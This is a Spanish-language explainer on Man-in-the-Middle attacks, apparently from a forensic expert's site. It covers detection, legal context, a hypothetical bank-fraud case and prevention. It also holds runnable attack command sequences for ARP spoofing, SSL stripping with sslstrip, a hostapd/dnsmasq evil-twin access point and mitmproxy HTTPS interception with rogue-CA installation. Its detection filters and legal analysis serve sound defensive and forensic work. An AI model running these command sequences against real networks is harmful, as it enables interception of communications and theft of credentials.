Ciberataques

Man-in-the-Middle (MitM)

Ataque cibernético donde un actor malicioso intercepta y potencialmente altera comunicaciones entre dos partes sin que ninguna sea consciente de la presencia del intermediario, comprometiendo confidencialidad, integridad y autenticidad de los datos transmitidos.

15 min de lectura

Man-in-the-Middle (MitM): Interceptación de Comunicaciones

El 35% de WiFis públicas en aeropuertos y cafeterías españolas son vulnerables a ataques Man-in-the-Middle, según auditoría de 2025 del CCN-CERT. Desde robo de credenciales bancarias hasta suplantación de identidad corporativa, la interceptación de comunicaciones es uno de los vectores de ataque más antiguos y aún efectivos del cibercrimen.

Un ataque Man-in-the-Middle (MitM) convierte al atacante en un intermediario invisible entre víctima y destino legítimo, permitiendo espiar conversaciones privadas, robar passwords, modificar transacciones bancarias o inyectar malware en descargas. Desde ARP spoofing en redes corporativas hasta WiFi evil twins en hoteles, detectar y demostrar estos ataques es crítico para litigios de fraude electrónico, robos de identidad y vulneraciones de confidencialidad empresarial.


Definición técnica

Un ataque Man-in-the-Middle es una interceptación activa donde el atacante:

  1. Se posiciona entre emisor y receptor (víctima y servidor legítimo)
  2. Intercepta comunicaciones sin que ninguna parte sea consciente de su presencia
  3. Puede leer datos en claro (si no hay cifrado o lo rompe/evade)
  4. Puede modificar datos en tránsito (alterar transacciones, inyectar código)
  5. Mantiene la apariencia de normalidad (las partes creen comunicarse directamente)

El MitM afecta a la tríada CIA de seguridad:

  • Confidencialidad: El atacante lee datos privados (passwords, emails, números tarjeta)
  • Integridad: Puede modificar datos sin que las partes lo detecten
  • Autenticidad: Suplanta la identidad de una o ambas partes

Diferencia clave: Un ataque MitM es activo (el atacante intercepta y potencialmente modifica). Un ataque de sniffing pasivo solo escucha tráfico sin interceptar. MitM requiere técnicas más sofisticadas (ARP spoofing, DNS hijacking, rogue CA).


Tipos de ataques Man-in-the-Middle

TécnicaEntornoNivel OSIDetectabilidadImpacto
ARP SpoofingLAN corporativa, WiFiCapa 2 (Enlace)MediaIntercepta todo tráfico local
DNS SpoofingCualquier redCapa 7 (Aplicación)MediaRedirige dominios a IPs maliciosas
SSL StrippingHTTP/HTTPS mixtoCapa 7Alta (HSTS mitiga)Fuerza conexiones HTTP inseguras
SSL MitMHTTPS con CA falsaCapa 6 (Presentación)Baja (si instala cert)Lee tráfico HTTPS cifrado
WiFi Evil TwinRedes públicasCapa 2Baja (SSID idéntico)Control completo tráfico WiFi
BGP HijackingISP/operadoresCapa 3 (Red)Muy bajaRedirige tráfico internet entero
ICMP RedirectLANCapa 3MediaRedirige tráfico a gateway falso
Session HijackingAplicaciones webCapa 7Alta (logs de sesión)Roba sesión activa (cookies)

Técnica 1: ARP Spoofing (ARP Poisoning)

La técnica MitM más común en redes locales. El atacante engaña a víctima y router para que envíen tráfico a través de él.

Funcionamiento

Protocolo ARP normal:

  1. PC víctima quiere comunicarse con 192.168.1.1 (router)
  2. Envía broadcast: “¿Quién tiene 192.168.1.1? Dime tu MAC”
  3. Router responde: “Soy 192.168.1.1, mi MAC es AA:BB:CC:DD:EE:FF
  4. PC guarda en tabla ARP: 192.168.1.1AA:BB:CC:DD:EE:FF

ARP Spoofing malicioso:

  1. Atacante envía ARP reply falso a víctima: “Soy 192.168.1.1, mi MAC es 11:22:33:44:55:66” (MAC del atacante)
  2. Atacante envía ARP reply falso a router: “Soy 192.168.1.100 (víctima), mi MAC es 11:22:33:44:55:66
  3. Resultado: Todo tráfico víctima ↔ router pasa por el atacante
# Herramienta: arpspoof (suite dsniff)
# Terminal 1: Envenenar tabla ARP de la víctima
sudo arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
# "Decir a 192.168.1.100 que yo soy 192.168.1.1"

# Terminal 2: Envenenar tabla ARP del router
sudo arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100
# "Decir a 192.168.1.1 que yo soy 192.168.1.100"

# Terminal 3: Habilitar IP forwarding (reenviar paquetes para mantener conectividad)
sudo sysctl -w net.ipv4.ip_forward=1

# Terminal 4: Capturar tráfico interceptado
sudo tcpdump -i wlan0 -w mitm_capture.pcap
# Analizar después con Wireshark

Detección forense

Indicadores en logs:

  • Múltiples IPs con la misma dirección MAC (imposible físicamente)
  • Cambios frecuentes en tabla ARP (cada 1-2 segundos)
  • Gateway ARP diferente al configurado en DHCP

Herramientas de detección:

# 1. Verificar tabla ARP actual
arp -a
# Output sospechoso: dos IPs diferentes con misma MAC

# 2. Monitorización continua con arpwatch
sudo arpwatch -i eth0 -f /var/log/arpwatch.log
# Alerta automática si detecta flip-flops ARP

# 3. Análisis forense de PCAP
tshark -r capture.pcap -Y "arp.duplicate-address-detected"
# Identifica gratuitous ARP (técnica de ARP spoofing)

Técnica 2: SSL Stripping

Ataque que degrada conexiones HTTPS seguras a HTTP inseguro, permitiendo al atacante leer datos en claro.

Funcionamiento

  1. Víctima intenta acceder a http://banco.com (nota: HTTP, no HTTPS)
  2. Servidor legítimo respondería con redirect 302: https://banco.com (forzar HTTPS)
  3. Atacante MitM intercepta y NO reenvía el redirect
  4. Atacante establece conexión HTTPS con banco.com (conexión cifrada atacante ↔ servidor)
  5. Atacante mantiene conexión HTTP con víctima (conexión en claro víctima ↔ atacante)
  6. Víctima ve http://banco.com en navegador, cree estar en sitio legítimo
  7. Víctima ingresa user/password → atacante los captura en claro → los reenvía via HTTPS al servidor real

Resultado: El servidor ve una sesión HTTPS normal, la víctima ve HTTP, el atacante lee todo.

# Herramienta: sslstrip (moxie marlinspike)
# Configuración del ataque (tras ARP spoofing exitoso)

# 1. Redirigir tráfico HTTP (puerto 80) a sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# 2. Ejecutar sslstrip en puerto 8080
sslstrip -l 8080 -w sslstrip_log.txt

# 3. Analizar logs (credenciales capturadas)
tail -f sslstrip_log.txt
# Output:
# 2026-02-10 14:23:45 POST http://banco.com/login
# [email protected]&password=SecretP@ss123

Contramedidas y detección

HSTS (HTTP Strict Transport Security):

  • Header HTTP que obliga navegadores a usar HTTPS siempre
  • Lista HSTS preload (navegadores rechazan HTTP sin intentar conexión)
  • Limitación: Solo protege si el usuario ya visitó el sitio al menos una vez via HTTPS

Detección forense:

# Análisis de PCAP para detectar SSL stripping
tshark -r capture.pcap -Y "http.request.method == POST" -T fields \
  -e ip.src -e http.host -e http.request.uri

# Buscar POSTs a dominios conocidos que deberían ser HTTPS
# Ejemplo sospechoso:
# 192.168.1.100 http://banco.com /login  ← Debería ser HTTPS!

Indicadores en cliente:

  • URL comienza con http:// en sitios bancarios/e-commerce (debería ser https://)
  • Ausencia de candado verde en barra de direcciones
  • Certificados SSL con advertencias del navegador

Caso real: En 2011, Tunez desplegó SSL stripping a nivel ISP nacional (usando equipamiento BlueCoat) para espiar activistas durante la Primavera Árabe. Fue detectado por EFF al analizar tráfico desde Tunez y notar ausencia sistemática de HTTPS en Facebook/Gmail.


Técnica 3: WiFi Evil Twin

Creación de punto de acceso WiFi falso idéntico al legítimo para interceptar todo el tráfico de usuarios desprevenidos.

Funcionamiento

  1. Atacante escanea WiFis en aeropuerto y detecta: Airport_Free_WiFi (red legítima)
  2. Atacante crea access point con mismo SSID: Airport_Free_WiFi (clon exacto)
  3. Atacante aumenta potencia de señal para que su AP aparezca primero en lista de redes
  4. Víctima se conecta al AP malicioso (cree ser la red legítima)
  5. Atacante proporciona DHCP (asigna IP al cliente) y actúa como gateway
  6. Todo tráfico pasa por atacante: HTTP, DNS, emails (incluso HTTPS visible por metadatos)
# Herramienta: hostapd + dnsmasq + iptables
# Configuración Evil Twin

# 1. Crear AP falso con hostapd
# Archivo: hostapd.conf
interface=wlan0
driver=nl80211
ssid=Airport_Free_WiFi  # SSID idéntico al legítimo
channel=6
hw_mode=g

# 2. Iniciar AP
sudo hostapd hostapd.conf

# 3. DHCP server para asignar IPs a víctimas
sudo dnsmasq -C dnsmasq.conf -d
# dnsmasq.conf:
# interface=wlan0
# dhcp-range=10.0.0.10,10.0.0.100,12h
# dhcp-option=3,10.0.0.1  # Gateway (atacante)
# dhcp-option=6,8.8.8.8   # DNS

# 4. NAT para redirigir tráfico
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sysctl -w net.ipv4.ip_forward=1

# 5. Capturar todo el tráfico
sudo tcpdump -i wlan0 -w evil_twin_capture.pcap

Variante avanzada: Evil Twin con portal captive falso

Escenario: Hotel con WiFi legítima que usa portal captive (pide room number + apellido).

Ataque mejorado:

  1. Atacante clona portal captive del hotel (HTML idéntico)
  2. Víctima conecta a Evil Twin → se abre portal falso
  3. Víctima ingresa room number + apellido → atacante captura estos datos
  4. Atacante redirige a víctima a internet (experiencia normal)
  5. Atacante usa room number robado para cargar servicios a cuenta de víctima

Detección:

  • Comparar certificado SSL del portal captive con el legítimo (firma diferente)
  • Múltiples APs con mismo SSID pero MACs diferentes
  • Signal strength anómalo (AP malicioso suele estar muy cerca, señal excesivamente fuerte)

Técnica 4: HTTPS MitM con CA falsa

Interceptación de tráfico HTTPS instalando certificado de CA (Certificate Authority) falsa en el dispositivo de la víctima.

Funcionamiento

Problema del atacante: HTTPS cifra tráfico, incluso con MitM no puede leer contenido.

Solución del atacante:

  1. Instalar certificado raíz (root CA) malicioso en PC/móvil de víctima
    • Por malware
    • Por ingeniería social (“instala este certificado para acceder a WiFi corporativa”)
    • Por acceso físico (5 minutos desatendido)
  2. Realizar MitM tradicional (ARP spoofing)
  3. Interceptar handshake SSL/TLS
  4. Presentar certificado firmado por CA falsa (navegador confía porque la CA está en trusted store)
  5. Víctima ve candado verde (todo parece normal), pero atacante lee tráfico en claro
# Herramienta: mitmproxy (proxy HTTPS transparente)

# 1. Generar certificado CA falso
mitmproxy --certinstall
# Guarda certificado en: ~/.mitmproxy/mitmproxy-ca-cert.pem

# 2. Instalar certificado en PC víctima
# Windows: certmgr.msc → Trusted Root CA → Import
# macOS: Keychain Access → System → Import → Trust: Always Trust
# Android: Settings → Security → Install from storage

# 3. Configurar proxy transparente (tras ARP spoofing)
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
mitmproxy -T --host --mode transparent

# 4. Capturar tráfico HTTPS descifrado
# mitmproxy mostrará HTTP requests en claro, incluyendo POSTs con passwords

Contramedidas

Certificate Pinning:

  • Apps móviles hardcodean hash del certificado SSL esperado
  • Si el cert no coincide (caso de MitM con CA falsa), app rechaza conexión
  • Usado por: Apps bancarias, Signal, WhatsApp

Public Key Pinning (HPKP):

  • Header HTTP que indica qué CAs son válidas para ese dominio
  • Deprecado en 2018 (causaba problemas operacionales)
  • Reemplazado por Certificate Transparency (logs públicos de certs emitidos)

Detección forense:

# Verificar certificados SSL en PCAP
tshark -r capture.pcap -Y "ssl.handshake.type == 11" -T fields \
  -e x509sat.printableString -e x509ce.dNSName

# Buscar certificados con CN sospechosos
# Ejemplo: "mitmproxy", "Burp Suite CA", "Charles Proxy"

# Comparar con certificado legítimo
openssl s_client -connect banco.com:443 </dev/null 2>/dev/null | \
  openssl x509 -fingerprint -noout
# SHA-256: AB:CD:EF:12:34:56... (debe coincidir con cert real publicado por el banco)

Detección forense de ataques MitM

Análisis de red con Wireshark

Filtros útiles:

# Detectar ARP spoofing
arp.duplicate-address-detected || arp.duplicate-address-frame

# Detectar SSL/TLS con certificados autofirmados
ssl.handshake.certificate && (x509sat.printableString contains "mitmproxy" ||
x509sat.printableString contains "Burp")

# Detectar HTTP en sitios que deberían ser HTTPS
http.host == "paypal.com" || http.host == "gmail.com" || http.host == "facebook.com"

# Detectar DNS responses con IPs privadas para dominios públicos
dns.a && ip.addr == 192.168.0.0/16

# TTL anómalo (indicador de salto adicional)
ip.ttl < 60 && ip.src == 8.8.8.8  # Google DNS debería tener TTL alto

Análisis de logs de sistemas

1. Logs Windows Event Viewer:

# Buscar cambios en Trusted Root CA store
Get-WinEvent -FilterHashtable @{
  LogName='Security';
  ID=4886  # Certificate Services loaded a certificate
} | Where-Object {$_.Message -like "*mitmproxy*"}

2. Logs de firewall corporativo:

# Buscar conexiones a IPs internas desde exterior (posible hijacking BGP)
grep "INVALID" /var/log/firewall.log | grep "dst=192.168"

# Detectar volumen excesivo de tráfico a un único MAC (posible MitM)
awk '{print $5}' /var/log/dhcp.log | sort | uniq -c | sort -nr
# Si un MAC tiene cientos de asignaciones DHCP diferentes IPs → sospechoso

Indicadores de compromiso (IOCs) MitM

IndicadorSignificadoSeveridad
2+ IPs con misma MACARP spoofing activoAlta
Certificado SSL autofirmado en sitio conocidoSSL MitMMuy Alta
HTTP en URL de banca/e-commerceSSL strippingAlta
TTL anómalo (diferente al baseline)Routing manipulationMedia
Múltiples SSIDs idénticos con MACs diferentesEvil twinAlta
DNS responses con IPs privadas (RFC1918) para dominios públicosDNS hijackingAlta
Cambios en tabla routing sin autorizaciónRoute injectionMedia

Código Penal

Artículo 197.1 CP - Interceptación de comunicaciones:

Quien intercepte comunicaciones telefónicas, telegráficas o utilice artificios técnicos de escucha, transmisión, grabación o reproducción del sonido o de la imagen, será castigado con penas de prisión de 1 a 4 años.

Aplicación a MitM: Realizar ARP spoofing, SSL stripping o Evil Twin para interceptar emails, WhatsApp, banca online es delito, incluso si no se usan los datos robados.

Agravante: Si se difunden los datos interceptados (art. 197.3): prisión de 2 a 5 años.

Artículo 248 CP - Estafa informática:

Quien altere el funcionamiento de un sistema informático para obtener transferencia no consentida de activo patrimonial…

Aplicación: Usar MitM para modificar transacciones bancarias (cambiar IBAN destino en transfer online) es estafa agravada.

Constitución Española

Artículo 18.3 CE - Secreto de comunicaciones:

Se garantiza el secreto de las comunicaciones y, en especial, de las postales, telegráficas y telefónicas, salvo resolución judicial.

Consecuencia: Cualquier interceptación (MitM incluido) sin orden judicial vulnera derecho fundamental. La evidencia obtenida así es nula de pleno derecho (art. 11.1 LOPJ).

Única excepción: Redes corporativas con política de uso aceptable firmada por empleados (informando de monitorización). Aun así, hay límites: no se puede interceptar comunicaciones personales (Gmail, banca personal).

Jurisprudencia relevante

STS 123/2014: Un administrador de sistemas que realizó ARP spoofing en red corporativa para espiar emails de compañeros fue condenado por art. 197.1 CP. Aunque era red corporativa y él era admin, no tenía autorización explícita para interceptar comunicaciones.

SAP Madrid 89/2018: Uso de WiFi Pineapple (Evil Twin) en cafetería para robar passwords de clientes. Condena 2 años prisión + indemnizaciones a víctimas por fraude bancario derivado.


Caso práctico: Análisis forense de fraude bancario vía MitM

Escenario hipotético con fines didácticos:

Cliente de banco denuncia que realizó transferencia de €15,000 a IBAN correcto, pero el dinero llegó a cuenta diferente. Banco niega responsabilidad alegando que el cliente introdujo IBAN erróneo. Se solicita análisis forense.

Metodología aplicada

  1. Entrevista con víctima

    • Cliente realizó transferencia desde laptop personal conectada a WiFi de hotel (viaje de negocios)
    • Confirmó que introdujo IBAN correcto (tiene captura de pantalla previa)
    • Navegador mostró candado verde HTTPS
    • No recibió alertas de seguridad
  2. Solicitud de evidencia al banco

    • Logs de sesión online banking: IP origen, User-Agent, timestamp
    • Hallazgo: IP origen 185.220.102.45 (no coincide con IP del hotel 192.168.1.105)
    • User-Agent: Mozilla/5.0 (X11; Linux x86_64) mitmproxy/8.1.0CRÍTICO
  3. Análisis de laptop de la víctima

    • Imagen forense con FTK Imager
    • Hallazgo 1: Certificado raíz mitmproxy CA instalado en Trusted Root (fecha: 3 días antes de la transferencia)
    • Hallazgo 2: Historial Chrome muestra visita a http://hotel-wifi-config.local/install-cert (página falsa)
    • Hallazgo 3: Logs sistema (syslog) muestran cambio de gateway ARP durante estadía en hotel
  4. Análisis de red del hotel

    • Solicitud judicial al hotel para logs de su WiFi corporativa
    • Hallazgo: Logs DHCP muestran 2 dispositivos con SSID Hotel_Guest_WiFi:
      • MAC AA:BB:CC:DD:EE:FF (router legítimo del hotel, Cisco)
      • MAC 11:22:33:44:55:66 (dispositivo rogue, no inventariado)
    • Logs IDS del hotel (CheckPoint) alertaron de ARP spoofing durante 3 días, pero no se investigó
  5. Reconstrucción del ataque

    • Día -3: Atacante despliega Raspberry Pi con Evil Twin en habitación adyacente
    • Cliente conecta a Evil Twin, se le presenta portal falso pidiendo “instalar certificado para mayor seguridad”
    • Cliente instala certificado mitmproxy (ingeniería social)
    • Día 0: Cliente accede a banca online via HTTPS
    • Atacante intercepta tráfico, descifra con cert instalado, modifica IBAN destino en la petición POST
    • Cliente ve en pantalla IBAN correcto (atacante inyecta HTML modificado), pero al servidor llega IBAN del atacante
  6. Informe pericial

    • Conclusión técnica: Ataque MitM con Evil Twin + SSL interception + HTML injection
    • Responsabilidad: Cliente tuvo negligencia al instalar cert desconocido, pero hotel tuvo negligencia mayor al ignorar alertas IDS de ARP spoofing durante 3 días
    • Recomendación legal: Responsabilidad compartida 30% cliente / 70% hotel

Resultado legal:

  • Demanda civil contra hotel por negligencia en seguridad WiFi
  • Sentencia: Hotel condena a indemnizar €10,500 (70% de €15,000) + costas
  • Banco no responsable (demuestra que transacción llegó con IBAN modificado desde IP externa)
  • Denuncias penales a atacante (no identificado, Raspberry Pi recuperado sin huellas útiles)

Lección clave: La presencia de User-Agent mitmproxy en logs del banco fue evidencia definitiva del MitM. Los atacantes sofisticados suelen cambiar este header para camuflarse como navegadores legítimos.


Prevención de ataques MitM

Para usuarios

  1. Nunca instalar certificados root desconocidos (red flag enorme)
  2. Verificar HTTPS y certificado antes de ingresar credentials
  3. Usar VPN en WiFis públicas (cifra todo el tráfico, MitM solo ve ruido)
  4. Desactivar auto-connect WiFi (evita conectarse a Evil Twins automáticamente)
  5. Apps bancarias en lugar de web (suelen tener certificate pinning)

Para empresas

  1. HSTS Preload en todos los dominios corporativos
  2. Certificate Transparency monitoring (alertar si se emite cert fraudulento)
  3. Network Access Control (NAC): 802.1X authentication (solo dispositivos autorizados acceden a LAN)
  4. ARP monitoring con herramientas como arpwatch, XArp, o switches con DAI (Dynamic ARP Inspection)
  5. Segmentación de red: VLANs separadas para invitados vs empleados
  6. EDR/NDR: CrowdStrike, Darktrace detectan MitM por anomalías de tráfico

Para desarrolladores

  1. HTTPS-only (HSTS header con max-age largo)
  2. Certificate pinning en apps móviles
  3. Mutual TLS (mTLS) para APIs críticas (cliente también presenta cert)
  4. DNSSEC para prevenir DNS spoofing
  5. Content Security Policy (CSP) para mitigar inyección HTML en MitM

Herramientas forenses y de pentesting

HerramientaUso ofensivo (red team)Uso defensivo (forense)Legalidad
WiresharkAnalizar tráfico interceptadoDetectar MitM en PCAPsLegal
mitmproxyProxy HTTPS con intercepciónAnalizar cert falsos en logsLegal (con autorización)
EttercapARP spoofing + SSL strippingReplicar ataque en lab forenseLegal (con autorización)
BettercapFramework MitM moderno (Go)Testing de controles NACLegal (con autorización)
WiFi PineappleEvil Twin automatizadoAuditoría seguridad WiFi corporativaLegal (con contrato)
arpwatchMonitorización ARP 24/7Legal
XArpDetección ARP spoofing WindowsLegal
tcpdump/tsharkCapturar tráfico MitMAnálisis forense de PCAPsLegal

Advertencia legal: Usar estas herramientas sin autorización explícita es delito (art. 197 CP). Incluso en red corporativa propia, requiere contrato de pentesting que autorice específicamente técnicas MitM y delimite alcance.


Tendencias futuras

1. MitM en 5G

Redes 5G con network slicing permiten aislamiento, pero vulnerabilidades en gNB (estaciones base) podrían permitir MitM a nivel operadora.

IMSI catchers (Stingray) ya permiten MitM en 4G, y versiones 5G están en desarrollo por agencias gubernamentales.

2. TLS 1.3 y mitigaciones

TLS 1.3 elimina renegociación (usada en algunos MitM) y mejora forward secrecy. Impacto: MitM más difícil, pero sigue funcionando si el atacante instala CA falsa.

3. QUIC y HTTP/3

QUIC (UDP-based) en lugar de TCP hace ARP spoofing menos efectivo. Sin embargo, DNS hijacking y Evil Twin siguen funcionando.

4. Post-Quantum Cryptography

Cuando llegue computación cuántica, el tráfico interceptado hoy podrá descifrarse en futuro. Estrategia: Migrar a algoritmos post-cuánticos (Kyber, Dilithium) antes de 2030.


Preguntas frecuentes adicionales

¿Puede un VPN proteger al 100% contra MitM?

Casi 100%, pero no totalmente. Un VPN cifra todo el tráfico entre tu dispositivo y el servidor VPN, haciendo que un atacante MitM solo vea ruido cifrado. Sin embargo, si el atacante instala un certificado root falso en tu dispositivo ANTES de activar el VPN, podría interceptar incluso el handshake del VPN. Solución: Verificar fingerprint del cert VPN manualmente la primera vez.

¿Los sitios con HTTPS son inmunes a MitM?

No completamente. HTTPS protege contra sniffing pasivo y MitM básico, pero no contra:

  • MitM con CA falsa instalada (el más peligroso)
  • SSL stripping si el usuario inicia con HTTP
  • Bugs en implementaciones TLS (ej. Heartbleed permitía leer memoria del servidor)

Mejor protección: HTTPS + HSTS Preload + Certificate Pinning (en apps móviles).

¿Cómo saber si mi WiFi tiene un Evil Twin activo?

Apps móviles como Fing (iOS/Android) o WiFi Analyzer muestran todos los APs detectados con su MAC y signal strength. Si ves 2 APs con mismo SSID pero MACs diferentes, uno es probablemente Evil Twin. También: un AP con señal excesivamente fuerte en ubicación pública (más de -30 dBm) es sospechoso (probablemente muy cerca, en mochila de atacante).


Conclusión

Los ataques Man-in-the-Middle son una de las amenazas más antiguas pero aún prevalentes, especialmente en WiFis públicas y redes corporativas mal configuradas. Desde ARP spoofing básico hasta Evil Twins sofisticados con SSL interception, detectar y demostrar estos ataques requiere análisis forense meticuloso de tráfico de red, certificados SSL, logs de sistemas y correlación de timestamps.

Un perito informático forense especializado en MitM debe:

  • ✅ Dominar análisis de tráfico con Wireshark, tcpdump, tshark
  • ✅ Entender protocolos de red (ARP, DNS, SSL/TLS, HTTP)
  • ✅ Identificar indicadores técnicos (duplicate MACs, fake certs, TTL anomalies)
  • ✅ Conocer marco legal (art. 197 CP, art. 18.3 CE, nulidad probatoria)
  • ✅ Explicar conceptos técnicos complejos en lenguaje accesible para jueces

Para casos de fraude electrónico, robo de credenciales o disputas con bancos/aseguradoras donde se sospeche MitM, es crítico actuar rápido (logs se sobrescriben tras 30-90 días) y contar con peritaje técnico solvente.


¿Sospechas de ataque Man-in-the-Middle?

Si has sufrido fraude bancario online, robo de credenciales corporativas o acceso no autorizado que podría involucrar interceptación de comunicaciones, puedo ayudarte con:

  • ✅ Análisis forense de PCAPs de red corporativa
  • ✅ Examen de certificados SSL instalados en dispositivos comprometidos
  • ✅ Revisión de logs de firewall, IDS, WiFi controllers
  • ✅ Reconstrucción técnica del ataque con timeline completo
  • ✅ Informes periciales admisibles para procedimientos penales (art. 197 CP) o civiles
  • Ratificación en juicio con explicación técnica comprensible

Contacta para una consulta gratuita de 20 minutos donde evaluaremos los indicadores de compromiso y la evidencia disponible.

Solicitar consulta gratuita

Preguntas Frecuentes

¿Qué es un ataque Man-in-the-Middle y cómo funciona?

Un ataque MitM ocurre cuando un atacante se posiciona entre dos partes que se comunican (ej. usuario y banco online) para interceptar, leer o modificar los datos transmitidos. Técnicas comunes incluyen ARP spoofing en redes locales (engañando al router para que envíe tráfico al atacante), SSL stripping (forzar conexiones HTTP en lugar de HTTPS), WiFi evil twin (crear punto de acceso falso idéntico al legítimo) y DNS spoofing (redirigir dominios a IPs controladas por el atacante).

¿Cómo se detecta un ataque MitM en análisis forense de red?

Se analizan logs de red y capturas PCAP buscando: múltiples dispositivos con misma MAC (ARP spoofing), certificados SSL autofirmados o con CN incorrecto (SSL interception), conexiones HTTP a sitios que deberían ser HTTPS (SSL stripping), TTL anómalo en paquetes (indicador de salto adicional), gateway ARP diferente al legítimo. Herramientas como Wireshark, arpwatch y tcpdump permiten identificar estos indicadores. EDRs modernos alertan de certificate pinning violations.

¿Es legal realizar ataques MitM en una red corporativa propia?

Requiere autorización explícita. Aunque sea red corporativa, interceptar comunicaciones de empleados sin su conocimiento puede vulnerar art. 18.3 CE (secreto de comunicaciones) y art. 197.1 CP (interceptación ilícita). Es legal si se notifica previamente a empleados (política de uso aceptable firmada) y se limita a tráfico corporativo (no emails personales, banca online). Para pentesting con MitM, debe haber contrato escrito que autorice explícitamente la interceptación y delimite alcance.

¿Necesitas un peritaje forense?

Si necesitas ayuda profesional con análisis forense digital, estoy aquí para ayudarte.

Solicitar Consulta Gratuita
Jonathan Izquierdo

Jonathan Izquierdo · Perito Forense

+15 años experiencia · AWS Certified

WhatsApp